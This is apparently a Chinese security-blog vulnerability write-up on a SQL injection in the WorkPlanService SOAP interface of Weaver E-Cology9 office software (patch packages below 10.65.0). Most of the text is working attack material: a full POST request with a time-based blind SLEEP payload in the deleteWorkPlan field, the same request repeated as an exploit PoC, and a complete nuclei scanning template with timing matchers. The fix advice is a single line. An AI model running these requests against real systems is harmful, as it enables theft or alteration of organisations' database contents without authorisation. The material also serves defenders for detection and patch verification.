0x01 产品简介
泛微E-Cology9 是泛微网络科技股份有限公司开发的一款高效、灵活、全面的企业信息化办公系统。
0x02 漏洞描述
泛微E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。
0x03 影响版本
泛微补丁包<10.65.0
0x04 搜索语法
FOFA
0x05 漏洞复现
系统登录界面
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| POST /services/WorkPlanService HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 466
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
|
可以使用盲注的形式进行攻击进行攻击
漏洞利用poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| POST /services/WorkPlanService HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 466
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
|
nuclei的poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
| id: E-Cology9-WorkPlanService-sqli
info:
name: 泛微E-Cology9 WorkPlanService 前台SQL注入
author: admin
severity: high
tags: oa,sqli,ecology
http:
- raw:
- |
POST /services/WorkPlanService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
- |
POST /services/WorkPlanService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(10-(IF(27=27,0,5)))))NZeo)</web:in0>
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "deleteWorkPlanResponse"
- type: dsl
dsl:
- 'duration_1>=6 && duration_1<=7'
- 'duration_2>=10 && duration_2<=11'
|
0x06 修复建议
更新补丁包